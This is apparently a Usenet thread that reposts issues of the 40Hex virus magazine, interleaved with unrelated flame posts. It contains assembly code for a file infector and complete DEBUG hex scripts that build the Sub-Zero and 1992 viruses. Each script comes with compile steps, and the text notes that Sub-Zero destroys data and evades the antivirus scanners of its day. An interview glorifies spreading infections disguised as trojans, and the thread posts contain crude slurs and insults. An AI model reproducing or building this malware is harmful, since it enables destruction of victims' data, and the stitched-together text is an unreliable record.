mov ah,40h ;write to file
lea dx,[si+105h] ;segment:offset of write buffer
mov cx,0A3h ;write 163 bytes
int 21h ;
jc loc_5 ;error? then quit
mov ax,4200h ;set file pointer
xor cx,cx ;to the top of the file
mov dx,1 ;
int 21h ;
mov ah,40h ;write to file
lea dx,[si+1ABh] ;offset of jump to virus code
mov cx,2 ;two bytes
int 21h ;
;now close the file
loc_5:
mov ah,3Eh ;close file
int 21h ;
loc_6:
jmp bp ;jump to original file
data_1 dw 0 ;
db '*.COM',0 ;wild card search string
sub_1 endp
seg_a ends
end start
-----------------------------------------------------------------------------
Its good to start off with a simple example like this. As you can see
what the virus does is use the DOS 4Eh function to find the firsy COM file
in the directory. If no files are found the program exits. If a file is
found it compares the virus id string (the virus jump instruction) to the
first two bytes of the COM file. If they match the program terminates.
If they don't match the virus will infect the file. Using two key MS-DOS
functions to infect.
The first -
INT 21h Function 42h
SET FILE POINTER
AH = 42h
AL = method code
BX = file handle
CX = most significant half to offset
DX = least " "
If there is an error in executing this function the carry flag will be set,
and AX will contian the error code. If no error is encountered
DX = most significant half of file pointer
AX = least " "
The second (and most) important function used by any virus is
INT 21h Function 40h
WRITE TO FILE OR DEVICE
AH = 40h
BX = handle
CX = number of bytes to write
DS:DX = segment of buffer
Returns
AX = bytes transferred
on error
AX = Error Code and flag is set.
An example of Function 40h is ----
mov ah,40h ;set function
mov bx,handle ;load bx with handle from prev open
mov cx,virus_size ;load cx with # of bytes to write
mov dx,offset write_buffer ;load dx with the offset of what to
;write to file
int 21h ;
This function is used by 98% of all MS-DOS viruses to copy itself to a
victim file.
Now heres a sample project - create a new strain of Tiny, have it restore
the original date and time etc...
HR
--
Si
CHRISTOPHER C ALLEN
REPLYING TO THIS MESSAGE
<6e9c48$5...@bgtnsc02.worldnet.att.net>, WRITTEN BY nyarl-tep:
: lets get something nice and sparkling clear
: shall we?
: lesbian means no men in side that pussy
: no fingers tongues or noses belonging to creatures with dicks poking the
: cooter
: my girlfriend and i are the only straight people living here
: that is because we do not have that childish attitude most
: who dont understand do
I get one thing "sparkling clear" that you are really aggressive and like
to define human anatomy with crude english words like "cooter" and that
you are not "childish"--and then there is the whole motor-cycling thing
cripes there are so many oddities in this post that I must hang-up and
design a "lesbians DEbunked!" site!
obviously you were flustered by the previous posts, let me give you a clue
Dont expect anyone to respect you with posts like this! I know this from
my own past hot-headed experience!
the word is vagina not cooter or hole or what-have-you
Now before you nyarl-tep reply to this , relax and think out what you want
say! try to show some class by not refering to anatomy with crude names
on a side note I have found that most motor-cycle jacket wearin lesbians
are extremly succeptible to a well known jedi-mind-trick, but thats in the
alt.2600 faq. So you already know that.......:)
oh yeah about the cop thing! Fuck the cops!
<----------|||---------->
Smaug
40H Vmag Issue 1 Volume 1 00003
- SUB-ZERO VIRUS -
Heres one for all of you who don't have an assembler. It can be
compiled using debug by naming the insert below SUB-ZERO.USR and
executing the command -
DEBUG < SUB-ZERO.USR
------------------------------------------------------------------------------
n sub-zero.com
e 0100 E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00
e 0110 00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5
e 0120 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
e 0130 0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C
e 0140 00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D
e 0150 5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10
e 0160 07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00
e 0170 05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00
e 0180 B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01
e 0190 00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80
e 01A0 FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B
e 01B0 8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50
e 01C0 B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39
e 01D0 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00
e 01E0 2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC
e 01F0 E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43
e 0200 00 2E FF 2E 47 00 33 C0 8E C0 8B 89 31 DB 2E A3
e 0210 4B 00 26 A0 FE 03 2E A2 4D 00 26 C7 06 FC 03 F3
e 0220 A5 26 C6 06 FE 03 CB 58 04 10 90 8E C0 0E 1F B9
e 0230 00 03 B1 88 33 F6 8B FE 06 B8 42 01 50 EA FC 03
e 0240 00 00 8C C8 8E D0 BC 00 07 33 C0 8E D8 2E A1 4B
e 0250 00 A3 FC 03 2E A0 4D 00 A2 FE 03 8B DC B1 04 D3
e 0260 EB 83 C3 10 2E 89 1E 33 00 B4 4A 2E 8E 06 31 00
e 0270 CD 21 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06 19
e 0280 00 0E 1F BA 5B 02 B8 21 25 CD 21 8E 06 31 00 26
e 0290 8E 06 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38 05
e 02A0 E0 F9 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 BB 35
e 02B0 00 52 51 53 50 06 1E B4 2A CD 21 2E C6 06 0E 00
e 02C0 00 81 F9 C6 07 74 30 3C 05 75 0D 80 FA 17 72 08
e 02D0 2E FE 06 0E 00 EB 20 90 B8 08 35 CD 21 2E 89 1E
e 02E0 13 00 2E 8C 06 15 00 0E 1F C7 06 1F 00 48 3F B8
e 02F0 08 25 BA 1E 02 CD 21 1F 07 58 5B 59 5A 9C 2E FF
e 0300 1E 17 00 1E 07 B4 49 CD 21 B4 4D CD 21 B4 31 BA
e 0310 00 06 B1 04 D3 EA 83 C2 10 CD 21 32 C0 CF 2E 83
e 0320 3E 1F 00 09 75 17 52 51 50 B4 2A CD 21 81 FA 06
e 0330 06 75 07 B8 01 07 B2 80 CD 13 58 59 5A 2E 83 2E
e 0340 1F 00 01 EB 11 20 20 53 75 62 2D 5A 65 72 6F 20
e 0350 4E 59 48 43 20 20 2E FF 2E 13 00 9C 80 FC E0 75
e 0360 05 B8 00 03 9D CF 80 FC DE 74 2D 80 FC DD 74 0E
e 0370 3D 00 4B 75 03 E9 B4 00 9D 2E FF 2E 17 00 58 58
e 0380 B8 00 01 2E A3 0A 00 58 2E A3 0C 00 F3 A4 9D 2E
e 0390 A1 0F 00 2E FF 2E 0A 00 83 C4 06 9D 8C C8 8E D0
e 03A0 BC 10 07 06 06 33 FF 0E 07 B9 10 00 8B F3 BF 21
e 03B0 00 F3 A4 8C D8 8E C0 2E F7 26 7A 00 2E 03 06 2B
e 03C0 00 83 D2 00 2E F7 36 7A 00 8E D8 8B F2 8B FA 8C
e 03D0 C5 2E 8B 1E 2F 00 0B DB 74 13 B9 00 80 F3 A5 05
e 03E0 00 10 81 C5 00 10 8E D8 8E C5 4B 75 ED 2E 8B 0E
e 03F0 2D 00 F3 A4 58 50 05 10 00 2E 01 06 29 00 2E 01
e 0400 06 25 00 2E A1 21 00 1F 07 2E 8E 16 29 00 2E 8B
e 0410 26 27 00 2E FF 2E 23 00 33 C9 B8 01 43 CD 21 B4
e 0420 3C CD 21 B8 00 4B 9D 2E FF 2E 17 00 2E 80 3E 0E
e 0430 00 01 74 E4 2E C7 06 70 00 FF FF 2E C7 06 8F 00
e 0440 00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51 52
e 0450 56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05 8A
e 0460 15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 77 02
e 0470 F7 E3 F7 E1 0B D2 75 05 3D 10 07 72 F0 2E 8B 16
e 0480 80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36 80 00
e 0490 8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80 2C
e 04A0 20 46 EB EC B9 0B 00 2B F1 BF 84 00 0E 07 B9 0B
e 04B0 00 F3 A6 75 03 E9 2F 02 B8 00 43 CD 21 72 05 2E
e 04C0 89 0E 72 00 72 25 32 C0 2E A2 4E 00 1E 07 8B FA
e 04D0 B9 41 00 F2 AE 80 7D FE 4D 74 0B 80 7D FE 6D 74
e 04E0 05 2E FE 06 4E 00 B8 00 3D CD 21 72 5A 2E A3 70
e 04F0 00 8B D8 B8 02 42 B9 FF FF BA FB FF CD 21 72 EB
e 0500 05 05 00 2E A3 11 00 B9 05 00 BA 6B 00 8C C8 8E
e 0510 D8 8E C0 B4 3F CD 21 8B FA BE 05 00 F3 A6 75 07
e 0520 B4 3E CD 21 E9 C0 01 B8 24 35 CD 21 89 1E 1B 00
e 0530 8C 06 1D 00 BA 1B 02 B8 24 25 CD 21 C5 16 80 00
e 0540 33 C9 B8 01 43 CD 21 72 3B 2E 8B 1E 70 00 B4 3E
e 0550 CD 21 2E C7 06 70 00 FF FF B8 02 3D CD 21 72 24
e 0560 2E A3 70 00 8C C8 8E D8 8E C0 8B 1E 70 00 B8 00
e 0570 57 CD 21 89 16 74 00 89 0E 76 00 B8 00 42 33 C9
e 0580 8B D1 CD 21 72 3D 80 3E 4E 00 00 74 03 EB 57 90
e 0590 BB 00 10 B4 48 CD 21 73 0B B4 3E 8B 1E 70 00 CD
e 05A0 21 E9 43 01 FF 06 8F 00 8E C0 33 F6 8B FE B9 10
e 05B0 07 F3 A4 8B D7 8B 0E 11 00 8B 1E 70 00 06 1F B4
e 05C0 3F CD 21 72 1C 03 F9 33 C9 8B D1 B8 00 42 CD 21
e 05D0 BE 05 00 B9 05 00 F3 2E A4 8B CF 33 D2 B4 40 CD
e 05E0 21 72 0D E9 BC 00 B9 1C 00 BA 4F 00 B4 3F CD 21
e 05F0 72 4A C7 06 61 00 84 19 A1 5D 00 A3 45 00 A1 5F
e 0600 00 A3 43 00 A1 63 00 A3 47 00 A1 65 00 A3 49 00
e 0610 A1 53 00 83 3E 51 00 00 74 01 48 F7 26 78 00 03
e 0620 06 51 00 83 D2 00 05 0F 00 83 D2 00 25 F0 FF A3
e 0630 7C 00 89 16 7E 00 05 10 07 83 D2 00 72 3A F7 36
e 0640 78 00 0B D2 74 01 40 A3 53 00 89 16 51 00 A1 7C
e 0650 00 8B 16 7E 00 F7 36 7A 00 2B 06 57 00 A3 65 00
e 0660 C7 06 63 00 C5 00 A3 5D 00 C7 06 5F 00 10 07 33
e 0670 C9 8B D1 B8 00 42 CD 21 72 0A B9 1C 00 BA 4F 00
e 0680 B4 40 CD 21 72 11 3B C1 75 18 8B 16 7C 00 8B 0E
e 0690 7E 00 B8 00 42 CD 21 72 09 33 D2 B9 10 07 B4 40
e 06A0 CD 21 2E 83 3E 8F 00 00 74 04 B4 49 CD 21 2E 83
e 06B0 3E 70 00 FF 74 31 2E 8B 1E 70 00 2E 8B 16 74 00
e 06C0 2E 8B 0E 76 00 B8 01 57 CD 21 B4 3E CD 21 2E C5
e 06D0 16 80 00 2E 8B 0E 72 00 B8 01 43 CD 21 2E C5 16
e 06E0 1B 00 B8 24 25 CD 21 07 1F 5F 5E 5A 59 5B 58 9D
e 06F0 2E FF 2E 17 00 00 00 00 00 00 00 00 00 00 00 00
e 0700 4D 9F 19 00 10 00 00 00 45 44 00 45 4C 00 00 00
e 0710 E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31 00 00
e 0720 00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19 A5
e 0730 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 06
e 0740 0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 6C
e 0750 00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00 4D
e 0760 5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 05 10
e 0770 07 84 19 C5 00 FA 05 1C 00 00 00 00 00 00 00 00
e 0780 05 00 20 00 21 00 28 02 00 02 10 00 90 6A 00 00
e 0790 B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 20 01
e 07A0 00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16 80
e 07B0 FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E 8B
e 07C0 8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 07 50
e 07D0 B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06 39
e 07E0 00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 10 00
e 07F0 2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 80 FC
e 0800 E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26 43
e 0810 CD 20 A3 AA D4 3A A3 1A 1A 1A 1A 1A 1A 1A 1A 1A
rcx
717
w
q
------------------------------------------------------------------------------
Sub-Zero is a memory resident COM and EXE infector that is based somewhat on
on Jerusalem-B. It is the ansestor to the virus Captian Trips
which at this time has not been nailed by SCAN.
Be carefull because this virus will most likly format you hard drive if you
run it on the wrong day. One day of the year it will perform a HD format.
I think it's in June, hmmmm... D-Day rings a bell.
As of Scan-77 this virus can not be detected by SCAN or F-Prot.
HR
--
Si
Smaug
40H Vmag Issue 1 Volume 1 00005
- 1992 VIRUS -
Heres another for you virus fiends. Its been labled 1992, the latest in the
line of viruses brought to you by SKISM.
While the virus is no groundbreaker - the graphic display that is given by
the virus will go down in history as the first of it's kind.
Copy the below to a file called 1992.USR then execute --
DEBUG < 1992.USR
------------------------------------------------------------------------------
n 1992.com
e 0100 EB 02 90 02 E8 03 00 E9 E7 05 51 BB 38 01 8A 2F
e 0110 32 2E 03 01 88 2F 43 81 FB 00 09 7E F1 59 C3 BA
e 0120 00 01 8B 1E E5 06 53 E8 E0 FF 5B B9 C8 07 B4 40
e 0130 CD 21 53 E8 D4 FF 5B C3 0D 10 1B 00 08 B1 1B 04
e 0140 C1 18 22 C6 BD 1B 01 B1 1B 15 B1 1B 01 1A 1B 00
e 0150 C1 18 04 C6 DB 02 B3 B3 14 18 19 B3 10 DF 22 22
e 0160 08 B1 1B 01 C1 18 0C C6 C0 18 05 C6 C3 C6 BD 22
e 0170 22 1A 1B 00 B1 1B 06 02 B3 B3 14 18 1D B3 10 DF
e 0180 22 08 C2 C6 C6 C0 C6 DB 1B 0C B1 1B 0B B1 22 22
e 0190 1A 1B 00 B1 1B 01 02 B3 B3 14 18 23 B3 10 DF 1B
e 01A0 00 08 B1 1B 12 B1 1B 0B C2 C6 C6 1A 1B 00 B1 1B
e 01B0 00 02 B3 B3 14 18 21 B3 10 DF 22 13 1B 06 0B DC
e 01C0 10 22 13 22 DC 10 22 13 22 DC 10 22 13 22 DC 10
e 01D0 22 13 1B 06 DC 10 22 13 22 22 DC 10 22 22 13 22
e 01E0 22 DC 10 22 22 1A 1B 00 08 B1 22 22 02 B3 B3 14
e 01F0 18 0A B3 0D 18 1A B3 02 10 DF 14 B3 B3 B3 10 DF
e 0200 13 22 0B DC 02 10 18 06 B3 13 22 0B DC 22 DC 02
e 0210 10 B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC 02 10
e 0220 18 06 B3 13 22 0B DC 22 DC 22 DC 22 DC 02 10 B3
e 0230 22 1A 1B 00 08 B1 22 22 02 B3 B3 14 18 05 B3 0D
e 0240 18 1B B3 02 10 DF 22 22 14 B3 10 DF 13 1B 06 0B
e 0250 DC 10 22 13 22 22 DC 02 10 B3 22 22 13 22 0B DC
e 0260 02 10 B3 13 1B 06 0B DC 10 22 13 22 DC 02 10 B3
e 0270 13 22 0B DC 02 10 B3 13 22 0B DC 02 10 B3 22 1A
e 0280 08 C6 C6 C0 DB 22 22 02 B3 B3 14 18 05 B3 0D 18
e 0290 0E B3 12 1B 05 14 18 01 B3 02 10 DF 1B 00 08 B1
e 02A0 22 22 02 B3 B3 B3 13 22 0B DC 02 10 B3 13 22 0B
e 02B0 DC 22 DC 02 10 B3 22 13 22 0B DC 02 10 B3 22 B3
e 02C0 B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC 02 10 B3
e 02D0 22 B3 B3 13 22 0B DC 02 10 B3 22 1A 22 22 08 B1
e 02E0 1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12 DC D9
e 02F0 D9 02 14 B3 B3 B0 B0 0D 12 D9 14 B3 B3 B3 02 10
e 0300 DF 1B 01 08 B1 22 13 1B 06 0B DC 02 10 B3 13 22
e 0310 0B DC 02 10 B3 13 22 0B DC 02 10 B3 13 22 0B DC
e 0320 02 10 B3 13 1B 06 0B DC 02 10 B3 13 22 0B DC 02
e 0330 10 B3 1B 00 13 22 0B DC 02 10 B3 22 1A 22 22 08
e 0340 B1 1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12 DC
e 0350 D9 D9 02 14 B3 B3 B3 B0 0D 12 D9 14 B3 B3 02 10
e 0360 DF 1B 06 08 B1 22 22 02 18 07 B3 22 B3 B3 22 B3
e 0370 B3 22 B3 B3 22 18 07 B3 22 B3 B3 1B 00 B3 B3 B3
e 0380 22 1A 22 22 08 B1 1B 00 02 B3 B3 14 18 01 B3 0D
e 0390 B3 B3 B3 02 B3 0D 18 0E B3 12 DC 18 07 D9 14 B3
e 03A0 B3 02 10 DF 1B 01 08 D8 C6 DB 1B 18 D8 C6 C6 C6
e 03B0 BD 22 22 1A 22 22 B1 1B 01 02 B3 B3 14 B3 B3 B3
e 03C0 0D 18 18 B3 02 10 DF 1B 00 08 C1 18 04 C6 C0 18
e 03D0 16 C6 DB 1B 00 B1 22 22 1A 22 22 C1 18 01 C6 BD
e 03E0 02 B3 B3 0D 14 18 1F B3 02 10 DF 22 22 08 B1 1B
e 03F0 07 16 22 0D 14 56 16 6A 67 22 6F 63 6C 22 75 6A
e 0400 6D 22 60 70 6D 77 65 6A 76 22 7B 6D 77 22 10 22
e 0410 22 08 B1 22 22 1A 22 22 B1 1B 01 B1 02 B3 B3 0D
e 0420 14 18 1E B3 02 10 DF 1B 00 08 B1 1B 01 02 B3 B3
e 0430 16 22 0D 34 30 30 2E 22 51 69 6B 71 6F 22 4D 6C
e 0440 67 2E 22 41 63 72 76 6B 63 6C 22 10 22 22 08 B1
e 0450 22 22 1A 22 22 B1 1B 01 B1 02 B3 B3 0D 14 18 10
e 0460 B3 02 10 DF 0D 14 18 05 B3 02 10 DF 1B 01 08 B1
e 0470 1B 01 02 B3 B3 16 22 0D 56 70 6B 72 71 2E 22 63
e 0480 6C 66 22 51 77 60 2F 58 67 70 6D 22 6C 6D 75 22
e 0490 10 22 22 08 B1 22 22 1A 22 22 B1 1B 01 B1 02 B3
e 04A0 B3 0D 14 18 10 B3 02 10 DF 1B 01 08 B1 1B 05 B1
e 04B0 1B 01 02 B3 B3 16 22 0D 71 6A 63 6C 69 71 22 7B
e 04C0 6D 77 22 63 65 63 6B 6C 2E 22 22 75 6B 76 6A 22
e 04D0 10 22 22 08 C2 C6 C6 1A 22 22 B1 1B 01 B1 02 B3
e 04E0 B3 0D 14 18 10 B3 02 10 DF 1B 01 08 C2 C6 C6 BD
e 04F0 1B 06 C1 C6 BD 22 22 02 B3 B3 16 22 0D 6A 6B 71
e 0500 22 6E 63 76 67 71 76 2C 2C 2C 1B 08 10 1B 06 1A
e 0510 22 22 08 C2 C6 C6 C0 C6 C3 02 B3 B3 0D 14 18 11
e 0520 B3 02 10 DF 1B 07 08 B1 1B 06 B1 22 B1 22 22 02
e 0530 18 1A B3 1B 04 1A 1B 06 08 B1 22 22 02 B3 B3 0D
e 0540 14 18 15 B3 02 10 DF 22 22 08 B1 1B 06 B1 22 C2
e 0550 18 1E C6 BD 1B 01 1A C6 C6 C0 C6 C6 DB 22 22 02
e 0560 B3 B3 0D 14 18 14 B3 02 10 DF 1B 00 08 C1 C6 C6
e 0570 C6 C0 C6 DB 1B 07 17 22 0C 51 69 6B 71 6F 22 33
e 0580 3B 3B 30 22 2F 22 54 6B 70 77 71 18 01 23 22 10
e 0590 22 08 C1 18 01 C6 1A 22 22 B1 1B 06 02 B3 B3 0D
e 05A0 14 18 0A B3 02 10 DF 1B 0A 08 D8 18 04 C6 DB 1B
e 05B0 00 B1 1B 07 02 B3 B3 17 1B 01 0D 45 67 76 22 63
e 05C0 22 6E 63 76 67 22 72 63 71 71 23 1B 01 10 22 08
e 05D0 B1 1B 01 1A D8 C6 DB 1B 00 02 B3 B3 0D 11 18 09
e 05E0 D9 14 D9 D9 12 DF 10 1B 07 08 B1 1B 08 B1 1B 07
e 05F0 02 18 1A B3 22 22 08 B1 1B 01 1A B1 22 02 B3 B3
e 0600 0D 11 18 19 D9 02 10 DF 1B 05 08 B1 1B 11 D8 18
e 0610 09 C6 DB 1B 01 1A 02 B3 B3 0D 12 18 22 D9 DF 10
e 0620 1B 06 08 B1 1B 11 B1 1B 12 1A 0D 12 18 21 D9 DF
e 0630 10 1B 01 08 C2 18 11 C6 DB 1B 12 1A 28 02 28 2C
e 0640 47 5A 47 02 5E 02 01 3D 3D 3D 3D 3D 3D 3D 3D 22
e 0650 22 22 11 01 02 02 02 28 D3 EF 48 13 68 7B D4 14
e 0660 02 02 02 02 46 4D 51 02 22 22 22 22 02 02 02 02
e 0670 02 01 3D 3D 3D 3D 3D 3D 3D 3D 47 5A 47 05 07 02
e 0680 23 02 28 D3 EF 48 22 2A 00 23 02 00 02 02 02 56
e 0690 43 50 45 47 50 2C 47 5A 47 02 02 02 95 32 44 04
e 06A0 73 04 95 32 02 56 47 4F 52 02 02 02 02 02 02 02
e 06B0 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
e 06C0 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
e 06D0 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02
e 06E0 02 02 02 02 02 07 02 2A 00 23 02 22 02 CF 22 02
e 06F0 02 BA 02 32 CF 23 3E 01 70 29 B6 2E CF 23 8A 14
e 0700 01 03 B6 28 CF 23 82 F8 1B 7E 06 3E 07 76 01 E9
e 0710 77 92 BC 3A 03 BA 02 BA 8C C2 BD 02 02 BB 06 07
e 0720 EA 07 02 E9 FC EB 88 02 E1 59 89 D5 31 C2 FE AE
e 0730 3E 22 70 07 A9 E0 FA E9 4E 3E 12 71 05 82 E6 F2
e 0740 08 E2 E9 F3 3E 1A 76 11 71 1B 2E 12 00 C2 00 C2
e 0750 00 C2 00 C2 82 E6 8D 08 E2 E9 D8 83 C0 A2 02 89
e 0760 F8 E9 D0 3E 19 70 05 77 CE 82 F6 82 E9 C5 3E 1B
e 0770 89 DB AE 88 CA B2 22 76 00 AE 49 30 EF 43 F1 A9
e 0780 89 C9 4B E2 A8 C1 B8 44 04 B6 18 CF 23 B6 1B CF
e 0790 23 88 D2 FC C0 B6 45 BC A7 04 CF 23 B8 46 04 B6
e 07A0 39 CF 23 BB 11 02 B8 3E 04 B6 4C CF 23 3F 10 02
e 07B0 77 01 E9 53 92 B6 4D CF 23 3F 10 02 76 45 B8 66
e 07C0 04 B6 39 CF 23 B6 2D CF 23 8E 04 9E 04 8B 1C 9C
e 07D0 04 B8 73 04 B6 18 CF 23 BB 05 02 B8 3C 04 B6 4C
e 07E0 CF 23 3F 10 02 77 23 B6 4D CF 23 3F 10 02 77 1A
e 07F0 B8 46 04 B6 39 CF 23 B6 18 8C 1C 9E 04 89 14 9C
e 0800 04 CF 23 E9 B2 E9 7B 92 B6 2D CF 23 8E 04 A0 04
e 0810 8B 1C A2 04 B8 8D 04 B9 73 04 89 45 1A A1 EB 04
e 0820 89 45 14 A1 E5 04 89 45 17 BA 02 41 CF 23 8B 0C
e 0830 E9 04 BA 03 41 31 CB CF 23 BA 02 3F CF 23 70 21
e 0840 A1 E7 04 B6 3D 89 1C E7 04 BB 00 02 B8 EF 04 CF
e 0850 23 B6 3C 89 1C E7 04 CF 23 89 1C EF 04 83 F9 E9
e 0860 00 77 0D B6 18 8C 1C A0 04 89 14 A2 04 CF 23 EB
e 0870 77 FD B8 8D 04 BA 00 3F CF 23 A1 E7 04 EA 9D FA
e 0880 BA 03 55 89 1C E7 04 89 0C E5 04 89 14 EB 04 CF
e 0890 23 BA 03 41 89 0C E9 04 B8 8D 04 CF 23 B6 39 B8
e 08A0 46 04 CF 23 B6 39 B8 A7 04 CF 23 BA 02 4E CF 23
e 08B0 4F 61 43 64 67 67 22 75 70 6D 76 67 22 55 6A 63
e 08C0 6E 67 23 23 23 23 23 23 1A 1A 1A 1A 1A 1A 1A 1A
rcx
7C8
w
q
------------------------------------------------------------------------------
The virus only infects systems running DOS 3.0 and up. It is non-resident
will only infect disks with more than two directorys. When the virus is
run it will seek out the first EXE file in the second directory from the
root. Each run after that will begin infection of files following. The
virus will jump from directory to directory when executed until it finds
an uninfected EXE file to nail.
On the last Friday of the month the virus will display a full color, full
screen message to all.
HR
--
Si
Smaug
40H Vmag Issue 1 Volume 1 00006
I think this magazine will be monthly, keep looking for it.
Next Issue -
Spotlight on Vienna
Editoral on virus speed
Article on Whale and if I can find it Whale source code.
plus
More viruses, more source code and more insight...
--
Si
Am I getting through to you undo?
Tech33
On 13 Mar 1998 04:25:07 GMT, "nyarl-tep" <nyarla...@bigfoot.com>
wrote:
>borders i will bring it up
>i am not "queer" as you put it
>i am a man
>jessica is a woman
>for those too fucking stupid to figure it out
>one account may = many users
>now borders you have a problem with gays?
>how bout hackers who are gay?
>i know plenty
>tell you what
>that worm you call a dick between you legs does not make you a man
>rather that which is between your ears
>there i find you gravely lacking
>and there upon your grave shall i defacate
>jessica and i are your betters mentally physically and spiritually
>you are as a newborn babe
>i am as the august sage
>Tech thirty three(respect,yet)
>there is no way to tell who i am
>none at all
>you may never know who types these lines
>unless you see me doing it
>and even then it takes years to really know a human being
>HUMANIODS wallow in your petty bigotry
>live your sad lives with the solace of morals programmed into you
>i love the sour smell of rotting minds
>grey matter curdled by christ and guilt
>in this world of fools i am the king of jesters
>try to find my soul in your hell
>
>
Many apologies to the great word-smith.
I found confusion to be my plight.
Whether a man or wo-man be your gender
makes not a whit of difference to me.
My comment was a bad attempt at humor,
please don't fret, as I know I would never 'know'
even my wife of fifteen cycles of the sun.
I feel saddened by our bigotry as you say,
but still find much pleasure in perusing your poetry.
As I sit here giving thought to my missive I realize this
is going to go to waste, as far as 96% of the people who
frequent this group.
Tech33
Tech33
On Fri, 13 Mar 1998 05:07:40 GMT, gnp...@vpbz.VFHPX.arg (Mercenary
PGP ROT 13) wrote:
<snip>
>
>Sheesh, you sound like one of those sucky christians. I like gays
>because are the solution to the world's overpopulation problem.
>
>
>Mercenary PGP
>Wrath of The Soldier Hand Delivered
>--
>If we all use encryption on all our e-mail, just think how
>much effort will be wasted trying to monitor all of it!
> --- R. G. Durnal
I was going to slam you for this, but then I simply realized that it
would achieve no purposes. One day you will no doubt (great band)
achieve greater understanding and forgiveness within your own heart,
but until then, you're not worth worrying about.
Tech33
Adam Stouffer
Why are you posting all this in respone to the stupid archange threads?
Give these files their own subjects.
Smaug
sounds like a fun discussion, but a bad subject.
--
40Hex Volume 1 Issue 2 0004
Interview with Skism One - AKA Lord SSS (triple S)
This interview was taken by Hellraiser on July 7, 1991 in Washington
Square Park, Manhatten.
HR: So what got you started in the virus business?
SSS: Well, I used to write graffiti all over and that got sort of
played out, so I needed something else distructive to do. So
I started getting into computers, then the next thing you know
I'm writing viruses.
HR: What was you first experence with viruses?
SSS: Well the first time I heard of them was when that dickhead got
arrested for putting the worm...
HR: You mean Morris?
SSS: Yeah that asshole, it was on the news and all that - so I got
to thinking, that would be a cool thing to do.
HR: What was the first virus you ran across?
SSS: Ha... Some dick gave me a copy of (pause) it think it was
Norton 4.0 when it first came out. So I took it home and put
it on my hard drive. The next thing you know all this weird
shit starts going on. Like programs won't run and this little
box opens up on the bottom of my screen all of a sudden. So I
get a copy of SCAN, then I find out almost all my files are
infected with Jerusalem.
HR: What did you do?
SSS: Well I re-formatted the drive and examined the copy of Jeru for
months. Then one day I used a Hex editor to change the suMSDOs
string to SKISM-1. Then I went to all the computers I could
find and infected them. The next thing you know my friend
shows me this list with my name on it. It was Patti Hoffmans
document. Shit, I thought I was the man back then.
HR: Then what?
SSS: Then - well I got into assembler and dissasembly and I started
to learn how to modify the code and all that. The next thing
you know I had made my own virus from the scraps of Jeru.
HR: Captian Trips, right?
SSS: Yeah, sort of. Then someone I know sent it to all the boards
in town under a trojan name and fucked a lot of peoples shit
up. Oh well. Then I guess I grew out of the scavenger mode
and started writting my own shit, from scratch.
HR: Like what?
SSS: Well they were all called Skism so and so, like Skism 10, Skism
11 and all that. Then I meet people and they started helping
me out and now we got this thing going on.
HR: You mean Smart Kids Into Sick Methods?
SSS: Yeah, you know all thid did did dat.
HR: How do you name your viruses?
SSS: Well depends whats on my mind. Skism was my tag for like four
years, so I thought it would be cool if people saw my name in
the newspaper and all that. I got Captian Trips after reading
The Stand, by Stephen King. 1992 was just what I named it cause
the virus came out to be about 1945 bytes so I jusy padded it out
to next years date. 808 was named after the TR-808, a 'drum
machine' used in hip-hop.
HR: Whats the latest projects?
SSS: You know, you wrote most of the shit.
HR: Tell them. The people.
SSS: Well, we did SKISM 1992, which was funny, then a member of
SKISM, who shall be nameless made 808. Now I'm just taking a
break from viruses and computers for the summer.
HR: You stopped?
SSS: Your crazy, nah - It's got to wait a while, then I'll get back
into it - when school starts again.
HR: What do you think of McAffe?
SSS: He's cool, what the fuck am supposed to say. He does a good
job at spreading my name around. I really like Pat Hoffman,
thanks for the write ups. You got to understand - these people
make us into infamous villians. I can deal with that.
HR: Do you mind them detecting your viruses?
SSS: Nah, fuck it - If my shit can make it from NY to California
without effort, it shows it works. Thats it. Thers a lot more
where that came from. One more thing, I hate that gay bitch
